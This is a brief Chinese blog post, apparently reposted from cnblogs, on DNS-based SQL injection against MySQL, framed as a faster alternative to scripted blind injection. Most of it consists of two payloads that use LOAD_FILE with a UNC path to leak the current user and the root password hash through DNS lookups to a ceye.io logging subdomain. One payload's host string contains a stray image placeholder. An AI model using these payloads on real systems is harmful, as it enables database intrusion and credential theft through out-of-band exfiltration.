小结--dns注入

0x01 杂言

最近实在是太忙了,考试都排满了,晚上刚考完,补一下昨天的东西,写一下dns注入。
我们知道在盲注的时候,要用脚本去跑,在测试的时候效率就不是很高,这时候用dns注入往往事半功倍

0x02 payload

这里直接贴一下payload

LOAD_FILE(CONCAT(0x5C5C,(HEX(USER())),0x2E3563733076642E636579652E696F5C313233))

下面这个是没有引号的
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.[图片]mysql.ip.port.xxxx.ceye.io\\abc'));

这里上面的地址可以用ceye.io这个网站去看dns的解析记录

猜你喜欢

转载自www.cnblogs.com/spark-xl/p/9094674.html
DNS